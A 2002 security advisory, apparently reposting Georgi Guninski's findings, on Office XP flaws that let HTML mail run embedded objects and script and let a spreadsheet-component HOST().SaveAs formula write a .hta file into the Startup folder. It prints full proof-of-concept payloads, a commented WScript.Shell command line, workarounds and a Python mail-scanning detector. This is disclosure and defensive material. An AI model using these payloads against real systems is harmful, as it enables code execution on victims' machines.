
Office XP - bug in ms spreadsheet component and insertion of active component in HTML mail
2nd Apr 2002 [SBWID-5221]
COMMAND

	bug in ms spreadsheet component and insertion of active component in
	HTML mail

SYSTEMS AFFECTED

	Office XP

PROBLEM

	 Update (04 April 2002) section 3 was added

	 ======

	

	Georgi Guninski, in his security advisory #53, 2002
	[http://www.guninski.com/m$oxp-2.html], reported the following bugs in
	Office XP:
	

	

	 Legal Notice:

	

	This Advisory is Copyright (c) 2002 Georgi Guninski.
	You may distribute it unmodified.
	You may not modify it and distribute it or distribute parts
	of it without the author's written permission.
	If you want to link to this content use the URL:
	http://www.guninski.com/m$oxp-2.html

	 Disclaimer:

	The information in this advisory is believed to be true though
	it may be false.
	The opinions expressed in this advisory and program are my own and
	not of any company. The usual standard disclaimer applies,
	especially the fact that Georgi Guninski is not liable for any damages
	caused by direct or indirect use of the information or functionality
	provided by this advisory or program. Georgi Guninski bears no
	responsibility for content or misuse of this advisory or program or
	any derivatives thereof.

	

	

	 Description:

	

	Actually there are at least three vulnerabilities in Office XP.
	

	1. It is possible to embed active content (object + script) in HTML
	mail, which is triggered if the user chooses reply or forward on the
	mail. This opens an exploit scenario for forcing the user to visit a
	page in the internet zone of IE at least. For another exploit scenario
	check (2).

	2. There is a bug in the ms spreadsheet component, namely in its Host()
	function, which may be exploited with the help of (1) or probably from
	any document opened with an Office application. This buggy function
	allows creating files with arbitrary names, and their content may be
	specified to some extent, which is sufficient to place an executable
	file (.hta) in the user's startup directory, which may lead to taking
	full control over the user's computer.
	

	This could probably be called cross-application scripting, because one
	application uses an object from another application.
	

	

	 Details:

	 

	The following must be put in HTML email which should be opened with
	Outlook XP, and the user should choose reply or forward.
	

	

	1.

	--------------------------------------

	<OBJECT id=WebBrowser1 height=150 width=300
	classid=CLSID:8856F961-340A-11D0-A96B-00C04FD705A2>
	<PARAM NAME="ExtentX" VALUE="7938">
	<PARAM NAME="ExtentY" VALUE="3969">
	<PARAM NAME="ViewMode" VALUE="0">
	<PARAM NAME="Offline" VALUE="0">
	<PARAM NAME="Silent" VALUE="0">
	<PARAM NAME="RegisterAsBrowser" VALUE="1">
	<PARAM NAME="RegisterAsDropTarget" VALUE="1">
	<PARAM NAME="AutoArrange" VALUE="0">
	<PARAM NAME="NoClientEdge" VALUE="0">
	<PARAM NAME="AlignLeft" VALUE="0">
	<PARAM NAME="ViewID" VALUE="{0057D0E0-3573-11CF-AE69-08002B2E1262}">
	<PARAM NAME="Location" VALUE="about:/dev/random<script>while (42) alert('HOHOHO\nTrying to sell trustworthy computing\nHOHOHO')</script>">
	<PARAM NAME="ReadyState" VALUE="4">
	</OBJECT>

	-------------------------------------

	

	

	 2.

	The office spreadsheet component is something like a mini Excel. It may
	be embedded in web pages (seems not exploitable) and in office documents
	(seems exploitable). It supports the Host() function, which returns the
	hosting object. So if you put the formula '=Host().SaveAs("name")' in a
	cell, a file with that name will be created.
	

	

	[Note, lines may be wrapped]

	---------------------------------------

	<h1>

	Hehe. Triyng to sell trustworthy computing.

	</h1>

	<object

	    classid=\"CLSID:0002E551-0000-0000-C000-000000000046\" id=Spreadsheet1

	    v:shapes=\"_x0000_s1026\" class=shape width=81 height=81

	    u1:shapes=\"_x0000_s1025\">

	    <param name=DataType value=XMLURL>

	    <param name=XMLData

	    value=\"<?xml version=\"1.0\"?>

	<ss:Workbook xmlns:o=\"urn:schemas-microsoft-com:office:office\"

	 xmlns:x=\"urn:schemas-microsoft-com:office:excel\"

	 

	xmlns:ss=\"urn:schemas-microsoft-com:office:spreadsheet\"

	 xmlns:c=\"urn:schemas-microsoft-com:office:component:spreadsheet\"

	 xmlns:html=\"http://www.w3.org/TR/REC-html40\">

	 

	<x:ExcelWorkbook>

	  <x:ProtectStructure>False</x:ProtectStructure>

	  <x:ActiveSheet>0</x:ActiveSheet>

	 </x:ExcelWorkbook>

	 <ss:Styles>

	  <ss:Style 

	ss:ID=\"Default\">

	   <ss:Alignment ss:Horizontal=\"Automatic\" ss:Rotate=\"0.0\" ss:Vertical=\"Bottom\"

	    ss:ReadingOrder=\"Context\"/>

	 

	<ss:Borders>

	   </ss:Borders>

	   <ss:Font ss:FontName=\"Arial\" ss:Size=\"10\" ss:Color=\"Automatic\" ss:Bold=\"0\"

	    ss:Italic=\"0\" 

	ss:Underline=\"None\"/>

	   <ss:Interior ss:Color=\"Automatic\" ss:Pattern=\"None\"/>

	   <ss:NumberFormat ss:Format=\"General\"/>

	   <ss:Protection 

	ss:Protected=\"1\"/>

	  </ss:Style>

	 </ss:Styles>

	 <c:ComponentOptions>

	  <c:Label>

	   <c:Caption>Microsoft Office Spreadsheet</c:Caption>

	 

	  </c:Label>

	  <c:PreventPropBrowser/>

	  <c:MaxHeight>80%</c:MaxHeight>

	  <c:MaxWidth>80%</c:MaxWidth>

	  <c:NextSheetNumber>1</c:NextSheetNumber>

	 

	</c:ComponentOptions>

	 <x:WorkbookOptions>

	  <c:OWCVersion>10.0.0.2621         </c:OWCVersion>

	  <x:DisableUndo/>

	 </x:WorkbookOptions>

	 <ss:Worksheet 

	ss:Name=\"Sheet1\">

	  <x:WorksheetOptions>

	   <x:Selected/>

	   <x:ViewableRange>R1:R262144</x:ViewableRange>

	   <x:Selection>R1C1</x:Selection>

	 

	<x:TopRowVisible>0</x:TopRowVisible>

	   <x:LeftColumnVisible>0</x:LeftColumnVisible>

	   <x:ProtectContents>False</x:ProtectContents>

	  </x:WorksheetOptions>

	 

	<c:WorksheetOptions>

	  </c:WorksheetOptions>

	  <ss:Table ss:ExpandedColumnCount=\"1\" ss:ExpandedRowCount=\"1\"

	   ss:DefaultColumnWidth=\"48.0\" 

	ss:DefaultRowHeight=\"12.75\">

	   <ss:Row>

	    <ss:Cell ss:Formula=\'=HOST().SaveAs(\"C:\\GGGG5\")\'>

	     <ss:Data ss:Type=\"Boolean\">1</ss:Data>

	 

	</ss:Cell>

	   </ss:Row>

	  </ss:Table>

	 </ss:Worksheet>

	 <ss:Worksheet ss:Name=\"Sheet2\">

	  <x:WorksheetOptions>

	 

	<x:ViewableRange>R1:R262144</x:ViewableRange>

	   <x:Selection>R1C1</x:Selection>

	   <x:TopRowVisible>0</x:TopRowVisible>

	 

	<x:LeftColumnVisible>0</x:LeftColumnVisible>

	   <x:ProtectContents>False</x:ProtectContents>

	  </x:WorksheetOptions>

	  <c:WorksheetOptions>

	 

	</c:WorksheetOptions>

	 </ss:Worksheet>

	 <ss:Worksheet ss:Name=\"Sheet3\">

	  <x:WorksheetOptions>

	   <x:ViewableRange>R1:R262144</x:ViewableRange>

	 

	<x:Selection>R1C1</x:Selection>

	   <x:TopRowVisible>0</x:TopRowVisible>

	   <x:LeftColumnVisible>0</x:LeftColumnVisible>

	 

	<x:ProtectContents>False</x:ProtectContents>

	  </x:WorksheetOptions>

	  <c:WorksheetOptions>

	  </c:WorksheetOptions>

	 </ss:Worksheet>

	 

	<o:DocumentProperties>

	   <o:Author>ad</o:Author>

	   <o:LastAuthor>ad</o:LastAuthor>

	   <o:Created>2002-03-17T12:07:37Z</o:Created>

	 

	<o:Company>g</o:Company>

	   <o:Version>10.2625</o:Version>

	  </o:DocumentProperties>

	  <o:OfficeDocumentSettings>

	   <o:DownloadComponents/>

	 

	<o:LocationOfComponents HRef=\"file:///E:\\\"/>

	  </o:OfficeDocumentSettings>

	</ss:Workbook>

	\">

	    <param name=AllowPropertyToolbox value=0>

	    <param name=AutoFit value=0>

	    <param name=Calculation value=-4105>

	    <param name=Caption value=\"Microsoft Office Spreadsheet\">

	    <param name=DisplayColumnHeadings value=-1>

	    <param name=DisplayGridlines value=-1>

	    <param name=DisplayHorizontalScrollBar value=-1>

	    <param name=DisplayOfficeLogo value=-1>

	    <param name=DisplayPropertyToolbox value=0>

	    <param name=DisplayRowHeadings value=-1>

	    <param name=DisplayTitleBar value=0>

	    <param name=DisplayToolbar value=-1>

	    <param name=DisplayVerticalScrollBar value=-1>

	    <param name=DisplayWorkbookTabs value=-1>

	    <param name=EnableEvents value=-1>

	    <param name=MaxHeight value=\"80%\">

	    <param name=MaxWidth value=\"80%\">

	    <param name=MoveAfterReturn value=-1>

	    <param name=MoveAfterReturnDirection value=-4121>

	    <param name=RightToLeft value=0>

	    <param name=ScreenUpdating value=-1>

	    <param name=EnableUndo value=0>

	   </object>

	---------------------------------

	

	

	3. The following must be put in HTML email which should be opened with
	Outlook XP, and the user should choose reply or forward. Probably it may
	also be embedded in a .doc or .xls file. The effect is shown after the
	user logs out and logs in again.
	

	----------------------------------------

	<h1>

	Hehe. Trying to sell trustworthy computing.

	</h1>

	

	<object

	    classid=\"CLSID:0002E551-0000-0000-C000-000000000046\" id=Spreadsheet1

	    v:shapes=\"_x0000_s1026\" class=shape width=81 height=81

	    u1:shapes=\"_x0000_s1025\">

	    <param name=DataType value=XMLURL>

	    <param name=XMLData

	    value=\"<?xml version=\"1.0\"?>

	<ss:Workbook xmlns:o=\"urn:schemas-microsoft-com:office:office\"

	 xmlns:x=\"urn:schemas-microsoft-com:office:excel\"

	 

	xmlns:ss=\"urn:schemas-microsoft-com:office:spreadsheet\"

	 xmlns:c=\"urn:schemas-microsoft-com:office:component:spreadsheet\"

	 xmlns:html=\"http://www.w3.org/TR/REC-html40\">

	 

	<x:ExcelWorkbook>

	  <x:ProtectStructure>False</x:ProtectStructure>

	  <x:ActiveSheet>0</x:ActiveSheet>

	 </x:ExcelWorkbook>

	 <ss:Styles>

	  <ss:Style 

	ss:ID=\"Default\">

	   <ss:Alignment ss:Horizontal=\"Automatic\" ss:Rotate=\"0.0\" ss:Vertical=\"Bottom\"

	    ss:ReadingOrder=\"Context\"/>

	 

	<ss:Borders>

	   </ss:Borders>

	   <ss:Font ss:FontName=\"Arial\" ss:Size=\"10\" ss:Color=\"Automatic\" ss:Bold=\"0\"

	    ss:Italic=\"0\" 

	ss:Underline=\"None\"/>

	   <ss:Interior ss:Color=\"Automatic\" ss:Pattern=\"None\"/>

	   <ss:NumberFormat ss:Format=\"General\"/>

	   <ss:Protection 

	ss:Protected=\"1\"/>

	  </ss:Style>

	 </ss:Styles>

	 <c:ComponentOptions>

	  <c:Label>

	   <c:Caption>Microsoft Office Spreadsheet</c:Caption>

	 

	  </c:Label>

	  <c:PreventPropBrowser/>

	  <c:MaxHeight>80%</c:MaxHeight>

	  <c:MaxWidth>80%</c:MaxWidth>

	  <c:NextSheetNumber>1</c:NextSheetNumber>

	 

	</c:ComponentOptions>

	 <x:WorkbookOptions>

	  <c:OWCVersion>10.0.0.2621         </c:OWCVersion>

	  <x:DisableUndo/>

	 </x:WorkbookOptions>

	 <ss:Worksheet 

	ss:Name=\"Sheet1\">

	  <x:WorksheetOptions>

	   <x:Selected/>

	   <x:ViewableRange>R1:R262144</x:ViewableRange>

	   <x:Selection>R1C1</x:Selection>

	 

	<x:TopRowVisible>0</x:TopRowVisible>

	   <x:LeftColumnVisible>0</x:LeftColumnVisible>

	   <x:ProtectContents>False</x:ProtectContents>

	  </x:WorksheetOptions>

	 

	<c:WorksheetOptions>

	  </c:WorksheetOptions>

	  <ss:Table ss:ExpandedColumnCount=\"1\" ss:ExpandedRowCount=\"1\"

	   ss:DefaultColumnWidth=\"48.0\" 

	ss:DefaultRowHeight=\"12.75\">

	   <ss:Row>

	    <ss:Cell ss:Formula=\'=HOST().SaveAs(\"../Start Menu/Programs/StartUp/gggg5.hta\",8)\'>

	     <ss:Data 

	ss:Type=\"Boolean\">1</ss:Data>

	    </ss:Cell>

	   </ss:Row>

	  </ss:Table>

	 </ss:Worksheet>

	 <ss:Worksheet ss:Name=\"Sheet2\">

	 

	<x:WorksheetOptions>

	   <x:ViewableRange>R1:R262144</x:ViewableRange>

	   <x:Selection>R1C1</x:Selection>

	   <x:TopRowVisible>0</x:TopRowVisible>

	 

	<x:LeftColumnVisible>0</x:LeftColumnVisible>

	   <x:ProtectContents>False</x:ProtectContents>

	  </x:WorksheetOptions>

	  <c:WorksheetOptions>

	 

	</c:WorksheetOptions>

	 </ss:Worksheet>

	 <ss:Worksheet ss:Name=\"Sheet3\">

	  <x:WorksheetOptions>

	   <x:ViewableRange>R1:R262144</x:ViewableRange>

	 

	<x:Selection>R1C1</x:Selection>

	   <x:TopRowVisible>0</x:TopRowVisible>

	   <x:LeftColumnVisible>0</x:LeftColumnVisible>

	 

	<x:ProtectContents>False</x:ProtectContents>

	  </x:WorksheetOptions>

	  <c:WorksheetOptions>

	  </c:WorksheetOptions>

	 </ss:Worksheet>

	 

	<o:DocumentProperties>

	   <o:Author>ad</o:Author>

	   <o:LastAuthor>ad</o:LastAuthor>

	   <o:Created>2002-03-17T12:07:37Z</o:Created>

	 

	<o:Company>g</o:Company>

	   <o:Version>10.2625</o:Version>

	  </o:DocumentProperties>

	  <o:OfficeDocumentSettings>

	   <o:DownloadComponents/>

	 

	<o:LocationOfComponents HRef=\"file:///E:\\\"/>

	  </o:OfficeDocumentSettings>

	</ss:Workbook>

	\">

	    <param name=AllowPropertyToolbox value=0>

	    <param name=AutoFit value=0>

	    <param name=Calculation value=-4105>

	    <param name=Caption value=\"Microsoft Office Spreadsheet\">

	    <param name=DisplayColumnHeadings value=-1>

	    <param name=DisplayGridlines value=-1>

	    <param name=DisplayHorizontalScrollBar value=-1>

	    <param name=DisplayOfficeLogo value=-1>

	    <param name=DisplayPropertyToolbox value=0>

	    <param name=DisplayRowHeadings value=-1>

	    <param name=DisplayTitleBar value=0>

	    <param name=DisplayToolbar value=-1>

	    <param name=DisplayVerticalScrollBar value=-1>

	    <param name=DisplayWorkbookTabs value=-1>

	    <param name=EnableEvents value=-1>

	    <param name=MaxHeight value=\"80%\">

	    <param name=MaxWidth value=\"80%\">

	    <param name=MoveAfterReturn value=-1>

	    <param name=MoveAfterReturnDirection value=-4121>

	    <param name=RightToLeft value=0>

	    <param name=ScreenUpdating value=-1>

	    <param name=EnableUndo value=0>

	   </object>

	<script>

	i=3;

	while (i--) confirm(\"Trustworthy?\");

	//x=new ActiveXObject(\"WScript.Shell\");

	//x.Run(\"C:\\\\WINNT\\\\SYSTEM32\\\\CMD.EXE /C DIR C:\\\\ /a /p /s\");

	</script>

	------------------------------------------

	

SOLUTION

	Workaround/Solution: The solution is to get a real mail client and
	office applications. The workaround for this particular problem is: for
	(1), disable everything that contains "active" in IE; for (2) (have
	not tested it personally), deregister and delete the ms office
	spreadsheet component.
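
	A detection-side complement to these workarounds, as an added example that is not part of the advisory: a mail-gateway check that flags HTML bodies carrying the two <object> CLSIDs shown above or a HOST().SaveAs formula. The function names, finding labels and the sample body are assumptions made for illustration.

```python
import html
import re
from html.parser import HTMLParser

# CLSIDs copied from the advisory's two <object> tags.
FLAGGED_CLSIDS = {
    "8856F961-340A-11D0-A96B-00C04FD705A2": "WebBrowser control",
    "0002E551-0000-0000-C000-000000000046": "Office spreadsheet component",
}
# Formula call the advisory describes for creating files: =HOST().SaveAs("...")
HOST_SAVEAS = re.compile(r"host\s*\(\s*\)\s*\.\s*saveas\s*\(", re.I)
# Constructed sample body (not real mail); the file name is a placeholder.
SAMPLE_FLAGGED = """<object classid="CLSID:0002E551-0000-0000-C000-000000000046" id=s1>
<param name=XMLData value="&lt;ss:Cell ss:Formula='=HOST().SaveAs(&quot;placeholder&quot;)'/&gt;">
</object>"""


class ObjectScanner(HTMLParser):
    """Collects findings for <object>, <script> and <param> tags in a mail body."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.findings = []

    def handle_starttag(self, tag, attrs):
        attrs = {k: (v or "") for k, v in attrs}
        if tag == "object":
            # Normalise "CLSID:{...}" / "clsid:..." to the bare GUID.
            clsid = attrs.get("classid", "").upper().replace("CLSID:", "")
            clsid = clsid.strip("{} ")
            self.findings.append("object:" + FLAGGED_CLSIDS.get(clsid, "unlisted control"))
        elif tag == "script":
            self.findings.append("script")
        elif tag == "param" and "<script" in attrs.get("value", "").lower():
            self.findings.append("script-in-param")


def scan_html_body(body):
    """Return sorted, de-duplicated findings for one HTML mail body."""
    scanner = ObjectScanner()
    scanner.feed(body)
    scanner.close()
    found = set(scanner.findings)
    # The formula sits inside an attribute value and may be entity-encoded,
    # so search both the raw and the entity-decoded text.
    if HOST_SAVEAS.search(body) or HOST_SAVEAS.search(html.unescape(body)):
        found.add("formula:HOST().SaveAs")
    return sorted(found)
```

	An empty list means nothing was flagged; any finding is a reason to strip the element or quarantine the message before it reaches the mail client.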
	

	 Vendor status:

	

	Microsoft was notified on 17 March 2002. They had 2 weeks to produce a
	patch but didn't.
	

	

	Regards,

	Georgi Guninski

	http://www.guninski.com

	

	

	 Update (04 April 2002)

	 ======

	

	Ben Schorr adds :
	

	To work around this problem in Outlook, go to Tools | Options | Mail
	Format and uncheck the boxes for "Use Word to..." That will cause
	Outlook to use its own native editor for such things and shuts the
	window on this exploit.
